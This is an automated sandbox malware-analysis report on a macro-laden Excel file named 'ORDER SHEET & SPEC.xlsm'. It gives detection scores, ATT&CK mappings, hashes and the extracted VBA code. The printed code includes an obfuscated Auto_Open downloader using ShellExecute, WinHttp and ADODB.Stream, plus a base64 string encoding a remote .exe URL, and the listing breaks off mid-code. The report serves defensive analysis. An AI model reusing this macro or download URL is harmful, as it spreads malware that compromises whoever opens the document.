Play interactive tour

Edit tour

Analysis Report ORDER SHEET & SPEC.xlsm

Overview

General Information

Sample Name:	ORDER SHEET & SPEC.xlsm
Analysis ID:	345832
MD5:	7ccf88c0bbe3b29bf19d877c4596a8d4
SHA1:	23f0506d857d38c3cd5354b80afc725b5f034744
SHA256:	7bcd31bd41686c32663c7cabf42b18c50399e3b3b4533fc2ff002d9f2e058813
Tags:	xlsm
Most interesting Screenshot:

Detection

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Document contains an embedded VBA macro which may execute processes

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Document contains an embedded VBA with many string operations indicating source code obfuscation

Document contains an embedded macro with GUI obfuscation

Allocates a big amount of memory (probably used for heap spraying)

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 532 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

• AV Detection
• Compliance
• Software Vulnerabilities
• Networking
• System Summary
• Data Obfuscation
• Hooking and other Techniques for Hiding and Protection

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: ORDER SHEET & SPEC.xlsm

ReversingLabs: Detection: 36%

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Source: excel.exe

Memory has grown: Private usage: 4MB later: 26MB

Networking:

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1A3727AD.emf

Jump to behavior

System Summary:

Document contains an embedded VBA macro which may execute processes

Show sources

Source: ORDER SHEET & SPEC.xlsm	OLE, VBA macro line: Private Type SHELLEXECUTEINFO
Source: ORDER SHEET & SPEC.xlsm	OLE, VBA macro line: Public Declare PtrSafe Function ShxllExxcute Lib "SHELL32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Source: ORDER SHEET & SPEC.xlsm	OLE, VBA macro line: Public Declare Function ShxllExxcute Lib "SHELL32.dll" Alias "ShellExecuteA" ( ByVal Hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Source: ORDER SHEET & SPEC.xlsm	OLE, VBA macro line: Private Declare PtrSafe Function ShellExecuteEx Lib "SHELL32.dll" ( Prop As SHELLEXECUTEINFO) As Long
Source: ORDER SHEET & SPEC.xlsm	OLE, VBA macro line: Private Declare Function ShellExecuteEx Lib "SHELL32.dll" ( Prop As SHELLEXECUTEINFO) As Long
Source: ORDER SHEET & SPEC.xlsm	OLE, VBA macro line: Dim Prop As SHELLEXECUTEINFO
Source: ORDER SHEET & SPEC.xlsm	OLE, VBA macro line: fnGetPropDlg = ShellExecuteEx(Prop)

Document contains an embedded VBA macro with suspicious strings

Show sources

Source: ORDER SHEET & SPEC.xlsm	OLE, VBA macro line: Private Type SHELLEXECUTEINFO
Source: ORDER SHEET & SPEC.xlsm	OLE, VBA macro line: Public Declare PtrSafe Function ShxllExxcute Lib "SHELL32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Source: ORDER SHEET & SPEC.xlsm	OLE, VBA macro line: Public Declare Function ShxllExxcute Lib "SHELL32.dll" Alias "ShellExecuteA" ( ByVal Hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Source: ORDER SHEET & SPEC.xlsm	OLE, VBA macro line: Private Declare PtrSafe Function ShellExecuteEx Lib "SHELL32.dll" ( Prop As SHELLEXECUTEINFO) As Long
Source: ORDER SHEET & SPEC.xlsm	OLE, VBA macro line: Private Declare Function ShellExecuteEx Lib "SHELL32.dll" ( Prop As SHELLEXECUTEINFO) As Long
Source: ORDER SHEET & SPEC.xlsm	OLE, VBA macro line: Dim Prop As SHELLEXECUTEINFO
Source: ORDER SHEET & SPEC.xlsm	OLE, VBA macro line: fnGetPropDlg = ShellExecuteEx(Prop)
Source: ORDER SHEET & SPEC.xlsm	OLE, VBA macro line: mu38swif2 = mu38swif2 & " usdi4y34jh = usdi4y34jh + ""( """"WinHttp.WinHttpRequest.5.1"""" )""" + vbCrLf

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Show sources

Source: ORDER SHEET & SPEC.xlsm

Stream path 'VBA/Module2' : found possibly 'ADODB.Stream' functions position, open, read, readtext, write

Document contains an embedded macro with GUI obfuscation

Show sources

Source: ORDER SHEET & SPEC.xlsm	Stream path '\x1Ole10Native' : Found suspicious string wscript.shell in non macro stream
Source: ORDER SHEET & SPEC.xlsm	Stream path '\x1Ole10Native' : Found suspicious string activexobject in non macro stream
Source: ORDER SHEET & SPEC.xlsm	Stream path '\x1Ole10Native' : Found suspicious string scripting.filesystemobject in non macro stream

Source: ORDER SHEET & SPEC.xlsm

OLE, VBA macro line: Sub Auto_Open()

Source: ORDER SHEET & SPEC.xlsm

OLE indicator, VBA macros: true

Source: mso1880.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: classification engine

Classification label: mal68.expl.evad.winXLSM@1/3@0/0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$ORDER SHEET & SPEC.xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR15B1.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: ORDER SHEET & SPEC.xlsm

ReversingLabs: Detection: 36%

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: ORDER SHEET & SPEC.xlsm	Initial sample: OLE zip file path = xl/drawings/vmlDrawing2.vml
Source: ORDER SHEET & SPEC.xlsm	Initial sample: OLE zip file path = xl/drawings/_rels/vmlDrawing2.vml.rels
Source: ORDER SHEET & SPEC.xlsm	Initial sample: OLE zip file path = xl/embeddings/oleObject1.bin
Source: ORDER SHEET & SPEC.xlsm	Initial sample: OLE zip file path = xl/embeddings/oleObject2.bin
Source: ORDER SHEET & SPEC.xlsm	Initial sample: OLE zip file path = xl/embeddings/oleObject3.bin
Source: ORDER SHEET & SPEC.xlsm	Initial sample: OLE zip file path = xl/media/image1.png
Source: ORDER SHEET & SPEC.xlsm	Initial sample: OLE zip file path = xl/media/image2.emf
Source: ORDER SHEET & SPEC.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: ORDER SHEET & SPEC.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: ORDER SHEET & SPEC.xlsm

Static file information: File size 2793487 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: ORDER SHEET & SPEC.xlsm

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Document contains an embedded VBA with many string operations indicating source code obfuscation

Show sources

Source: ORDER SHEET & SPEC.xlsm

Stream path 'VBA/Module2' : High number of string operations

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting52	Path Interception	Extra Window Memory Injection1	Masquerading1	OS Credential Dumping	File and Directory Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Scripting52	LSASS Memory	System Information Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Extra Window Memory Injection1	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ORDER SHEET & SPEC.xlsm	36%	ReversingLabs	Script-JS.Exploit.Bomber

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	345832
Start date:	29.01.2021
Start time:	07:30:19
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ORDER SHEET & SPEC.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.expl.evad.winXLSM@1/3@0/0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Too many dropped files, some of them have not been restored VT rate limit hit for: /opt/package/joesandbox/database/analysis/345832/sample/ORDER SHEET & SPEC.xlsm

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1A3727AD.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	4968
Entropy (8bit):	4.708742590880265
Encrypted:	false
SSDEEP:	96:sASqUJJJJJJJJJJJJvov1x31jFtlFHtfgJKRfd+/s:sAp3HtHkKRf0s
MD5:	B59DD20DE3FDC50CD6B3C4BAF9C12DE8
SHA1:	2E33A34FB7E7F15B267D99A4E42A2E50DCE7E3E8
SHA-256:	979DDE2AED02F077C16AE53546C6DF9EED40E8386D6DB6FC36AEE9F966D2CB82
SHA-512:	2C308D6AFB16EA9BA5451F0915BFE9D53A8978ABEB4C8159E688CCA6C40740ACE7931AE2AE9430CB96EC108DC1DB4780545CE0E75405289C09A2BBC1721DAC87
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	....l...........#.../................... EMF....h...............................@...................................................(...5...R...p...................................S.e.g.o.e. .U.I...................................................0v.W.f.f.i.c.e.\.O.f.f.i.c.e.1.2.......'..n.t........D.Up.........0vD.'..........B.w.W......4.wO?.w..Up<.N...N.P.N..?.w..Up..N...N.x.N....v$.......P.N.;....W..^.);.................'....v..........'...........'..o.t..........'......W...'.)}0v........dv......%...................................r...............#............... ... ..................?...........?................l...4........... ... ...(... ... ..... ............................................................................................................................................................................................................................................................................................................^................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso1880.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	359727104
Entropy (8bit):	2.3277392482729477E-4
Encrypted:	false
SSDEEP:	6:rl91bxctSF2wXItZXhlsGR1gElEqKsZXHg/6l//+KLMQl96hTylNhB4IMtbT:rl3byEF2wXILzsYJl5KyHPD9lL+H
MD5:	B7B637D36BE89C1F5B18510F489761CD
SHA1:	E28B85F76B0CAA7BB2184F7A8262A73EAB00B277
SHA-256:	AE73B0C415351AA3B1C5453536CFA06C6B6AA714BFB9A83DB958E93540E30507
SHA-512:	056A343637B489D46068EB9F062EFFDBEA37B9C19B73B229CC019A6A71C9D4CD307BB280947610FB37D16BBB029E11B4EA22A80A762CD5561AAE1255A2CAAEBB
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$ORDER SHEET & SPEC.xlsm Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Reputation:	high, very likely benign file
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General
File type:	Microsoft OOXML
Entropy (8bit):	1.5021307604050105
TrID:	Excel Microsoft Office Open XML Format document with Macro (57504/1) 48.93% Excel Microsoft Office Open XML Format document (40004/1) 34.04% Universe Sandbox simulation (12016/4) 10.22% ZIP compressed archive (8000/1) 6.81%
File name:	ORDER SHEET & SPEC.xlsm
File size:	2793487
MD5:	7ccf88c0bbe3b29bf19d877c4596a8d4
SHA1:	23f0506d857d38c3cd5354b80afc725b5f034744
SHA256:	7bcd31bd41686c32663c7cabf42b18c50399e3b3b4533fc2ff002d9f2e058813
SHA512:	0ec8f398d9ab943e2e38a086d87d750eccc081fb73c6357319e79fe9f69e66a5566c00ce6d297d0d5fadaa5c04220dcf4d9adea1e0c1f88f335dc1c63797dfdc
SSDEEP:	1536:Hhh3S1cLkPROxXYvoYIZCMMV2ZX0nIcjELcE3E:0cCOxtYIEbsX0n98E
File Content Preview:	PK.........^<R..............$.[Content_Types].xml.. ............\|l......\|l......\|l....U.N.0..#....W..H...,..%...p.I.[.d...=......*Hl....9gf..oZ.............pR.eE....W...[...P.-Dr.8=.?m=...6Vd...f,......`1..`x...d..5_.;....p6.Me..d1.....T....+.vI...w9UE...

File Icon


Icon Hash:	e4e2aa8aa4bcbcac

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	4

OLE File "/opt/package/joesandbox/database/analysis/345832/sample/ORDER SHEET & SPEC.xlsm"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Author:	Windows
Last Saved By:	Windows
Create Time:	2020-02-01T18:28:07Z
Last Saved Time:	2020-02-01T18:32:27Z
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Thumbnail Scaling Desired:	false
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	12.0000

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 740

General
Stream Path:	VBA/Module1
VBA File Name:	Module1.bas
Stream Size:	740
Data ASCII:	. . . . . . . . . * . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . _ b ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 01 f0 00 00 00 2a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 31 02 00 00 b5 02 00 00 00 00 00 00 01 00 00 00 5f 62 5e bf 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
VB_Name

VBA Code
`Attribute VB_Name = "Module1"`

VBA File Name: Module2.bas, Stream Size: 119905

General
Stream Path:	VBA/Module2
VBA File Name:	Module2.bas
Stream Size:	119905
Data ASCII:	. . . . . . . . . p . . . r . . . N . . . . . . . . . . . . . . . . . . . . . . . _ b . . . . . . . . . . . . . . . . . . . . p . . . . . b . . . . . . E M . . . . . . . . . . . . . . . . . . . . S h e l l E x e c u t e A . . . . . b . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e l l E x e c u t e E x . . S h e l l E x e c u t e E x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 03 8e 01 00 00 70 09 00 00 72 01 00 00 4e 02 00 00 ff ff ff ff cb 09 00 00 af 84 01 00 00 00 00 00 01 00 00 00 5f 62 0f b9 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 70 00 00 00 00 00 62 02 20 00 00 00 ff ff 45 4d 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 68 65 6c 6c 45 78 65 63 75 74 65 41 00 00 00 00 00 62 02 60 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
"C:\"
hournow
fMask
"yst"
adTypeText"
""ment"""
Object
""e""
Long)
Long,
""(aaax)"")
""Document"""
OutputBox("Enter
Declare
lpFile
.cbSize
xdecd(fnfgnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn,
mijv.ReadText"
yehrfjdks
uuenmdg
Date,
""eBody"")
uytrfghjhfrtyhgf"
uytrfghjhfrtyhgf,
""("""
"Note"
"Win"
OKSFCOVOYPYPOXG
Serial
wwityetygehrer
Append
""C:\progra""
""""\""""
SW_SHOWMINIMIZED
iCounter
vvfebtrfdhbtrdfg"
Execute(""Se""
""Re"""
total
""exec
novarue"
bgfcvbhgfd"
"ell"
""Docu""
""Path("""
""Ms"""
"properties"
SHELLEXECUTEINFO
"fnfgnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
Execute(""l=m"")
vvfebtrfdhbtrdfg
nvceuwkbfweu
""(aaax)"""
highlightSpecificValues()
xiocyrftreubg
""ReadText"")
cbSize
""Cr"""
objFSO.Folder""
DatePart("w",
cobvar
objFSO,
""Object"""
"mijv.Close"
vbNormal
Variant
""bject""
""Open
""ba"""
Worksheet
""ieeeeeeeeehhhhhfgfg
Alias
Value
lpDirectory
""spons"""
xcbhnjftr
While
vcvxcv
Const
Hour(Time())
""eateObject""
""W"""
""\program"""
Len(Prop)
""ob"""
Resume
then"
ForReading
""ite
wwityetygehrer"
""ipt."""
.fMask
Execute
bgfcvbhgfd
InputBox("Enter
iWorksheet
""(cobvar)
Execute(""gtyjnhjkfirejhrrhy=dfgerge:uytrfghjhfrtyhgf=vcvxcv"")
"cftcfrfcfrfcfr
mijv.Type
difudteje
oFile
Right(varforell,
String,
String)
"ogramd"
""Open"")
hInstApp
""."""
nvslsois
""stream_obj.""
mijv.CharSet
ForWriting
"....."
fnGetPropDlg
""gtyjnhjkfirejhrrhy,
""Set""
""(l)"""
hyuifiuygwhjekriu"
""Se""
""Delete"""
""Node"""
Execute(""strFile""
""eob"""
""later""
""Exists(path)"")"
Left(
Left(mddjekfr,
""Wr""
ByVal
strMsg"
""Set
doesn't
hhyvbvdtxct
ShellExecuteEx
lpVerb
"".D"""
"mijv.Position
""Exists(uytrfghjhfrtyhgf)"")"
ShellExecuteEx(Prop)
""""GET"""",
obvrva
nShow
Print
""ADODB""
"":"""
""FileSystemObject"""
VB_Name
""Scr"""
SW_SHOW
mijv.""
apfjebdlofe"
"".""
SW_SHOWMAXIMIZED
Execute(""stream_obj.""
""ieeeeeeeeehhhhhfgfg""
""Exists(
KillFile,
""InS""
Highlight")
objFile,
""Cr""
"mijv.CharSet
mluytgfdb)"
xdecd(
ActiveSheet.UsedRange
path"
dieueehniv
""tof""
Numbers")
#Else
""save"""
"\asc"
adTypeBinary
strFilepath
Public
"Else"
""M"""
varforell
CStr(ieeeeeeeeehhhhhfgfg)"
ForAppending
""ta\""
fgwrfguery
""ct"""
"Execute(""fnfgnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
""later"""
"dieueehniv
cftcfrfcfrfcfr,
""ile
fso.""
"")"""
Right(KillFile,
xxxxxpath
LCase(vvfebtrfdhbtrdfg)
lsksjegefectvvjdk""
nShowCmd
lpClass
bbbmap
""run
dwHotKey
""kk"""
ShxllExxcute
hProcess
.lpVerb
""C"""
""write""
""ateO""
""OM"""
"ata"
SetAttr
RetVal
""Stream""
lpParameters
""/"""
SW_SHOWMINIMIZED)
""Cre""
"txt"
worksheet."
rng.Style
Execute(""hdlkvgbfndm
""Sh"""
""File""
Len(Dir$(KillFile))
KillFile
"dows\"
"Execute(""mijv.""
""xm"""
stream_obj
Properties
""mijv.Type
""""data\asc""""
""Ele"""
""type
lsksjegefectvvjdk.DataType
""open""
lpIDList
""ate"""
""ux"""")"""
hIcon
stream_obj"
"""""""""
.hwnd
lsksjegefectvvjdk
"mijv.Type
""m"""
""""txt"""""")"
If(ggfffffffffggggggg)
vbCrLf
fnfgnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn"
mkggbetyuryjw
Execute(""gybghbgyh
fnGetPropDlg(strFilepath
gtyjnhjkfirejhrrhy,
"Enter
.lpFile
""eate"""
""File(path)"""
strFile
""cre"""
Then"
Auto_Open()
""in."""
""da""
exists."""
BHEOASEPJWDXYVVBEQYLDLQEMWMYCSLMJHI
""Scripting.""
"Window"
almvar
vbMonday)
""(""""a"""
"ipt"
""""TypedValue"""""""
"scr"
If(gybghbgyh)
PtrSafe
"call
""Build""
hkeyClass
"There
lpOperation
SHELLEXECUTEINFO)
False"""
""trRev""
""str"""
strFile,
""(ado)"""
""s"""
nyjstfhtyjyt
"""""
""je"""
String
slashy
""novarue
juvejrdugey
uuenmdg"
"""".""""
(ByVal
Range
vvfebtrfdhbtrdfg,
exist."""
"mancan
Execute(""ggfffffffffggggggg
""creat"""
""l"""
objFSO
dfgerge,
mijv.Close"
"apfjebdlofe
""Open:mijv.Wr""
Integer
'----------
"open",
objFSO"""
""nd"""
ieeeeeeeeehhhhhfgfg"""
lsksjegefectvvjdk.Text
Error
Value",
Attribute
nvceuwkbfweu"
brjysrjynryyyyyyyyf
Application.OperatingSystem
Close
MsgBox
""set
yyyyvar
ElseIf(hdlkvgbfndm)
"Execute(""ca""
mluytgfdb
juvejrdugey"
nvslsois)
mddjekfr
ieeeeeeeeehhhhhfgfg"")"
"ShellExecuteA"
Function
""O""
""b"""
""Create"""
mijv.Position
mancan"
Execute(""fso.""
novarue
Execute(""path
Else"
lsksjegefectvvjdk.""
Private

VBA Code

Attribute VB_Name = "Module2"

'----------
Const SW_SHOW = 1
Const SW_SHOWMAXIMIZED = 3
Const SW_SHOWMINIMIZED = 0

'// Properties API
Private Type SHELLEXECUTEINFO
    cbSize       As Long
    fMask        As Long
    hwnd         As Long
    lpVerb       As String
    lpFile       As String
    lpParameters As String
    lpDirectory  As String
    nShow        As Long
    hInstApp     As Long
    lpIDList     As Long
    lpClass      As String
    hkeyClass    As Long
    dwHotKey     As Long
    hIcon        As Long
    hProcess     As Long
End Type
#If Win64 Then
Public Declare PtrSafe Function ShxllExxcute Lib "SHELL32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
#Else
Public Declare Function ShxllExxcute     Lib "SHELL32.dll"         Alias "ShellExecuteA" (             ByVal Hwnd As Long,             ByVal lpOperation As String,             ByVal lpFile As String,             ByVal lpParameters As String,             ByVal lpDirectory As String,             ByVal nShowCmd As Long) As Long
#End If
#If Win64 Then
Private Declare PtrSafe Function ShellExecuteEx     Lib "SHELL32.dll" (         Prop As SHELLEXECUTEINFO) As Long
#Else
Private Declare Function ShellExecuteEx     Lib "SHELL32.dll" (         Prop As SHELLEXECUTEINFO) As Long
#End If
Public Function fnGetPropDlg(strFilepath As String) As Long
Dim Prop As SHELLEXECUTEINFO
With Prop
    .cbSize = Len(Prop)
    .fMask = &HC
    .hwnd = 0&
    .lpVerb = "properties"
    .lpFile = strFilepath
End With
fnGetPropDlg = ShellExecuteEx(Prop)
End Function
'----------
Sub highlightSpecificValues()
Dim rng As Range
Dim i As Integer
Dim c As Variant
c = InputBox("Enter Value To Highlight")
For Each rng In ActiveSheet.UsedRange
If rng = c Then
rng.Style = "Note"
i = i + 1
End If
Next rng
MsgBox "There are total " & i & " " & c & " in this worksheet."
End Sub
Sub Auto_Open()
BHEOASEPJWDXYVVBEQYLDLQEMWMYCSLMJHI = "489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
BHEOASEPJWDXYVVBEQYLDLQEMWMYCSLMJHI = "489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
BHEOASEPJWDXYVVBEQYLDLQEMWMYCSLMJHI = "489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
BHEOASEPJWDXYVVBEQYLDLQEMWMYCSLMJHI = "489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
BHEOASEPJWDXYVVBEQYLDLQEMWMYCSLMJHI = "489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
BHEOASEPJWDXYVVBEQYLDLQEMWMYCSLMJHI = "489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"


mu38swif2 = mu38swif2 & "vrh5kryyj4kiwq6ui = ""kk""" + vbCrLf
mu38swif2 = mu38swif2 & "vrh5kryyj4kiwq6ui = ""xbraHRUcHM6Ly9tdWx0aXdhcmV0ZWNub2xvZ2lhLmNvbS5ici9qcy9Qb2RhbGlyaTQuZXhl"" " + vbCrLf
mu38swif2 = mu38swif2 & "vrh5kryyj4kiwq6ui = Mid(vrh5kryyj4kiwq6ui, 4)" + vbCrLf
mu38swif2 = mu38swif2 & "uiytvdverwt67fhrey =""gy5UG9kYWxpcmk0LmV4ZQ==""" + vbCrLf
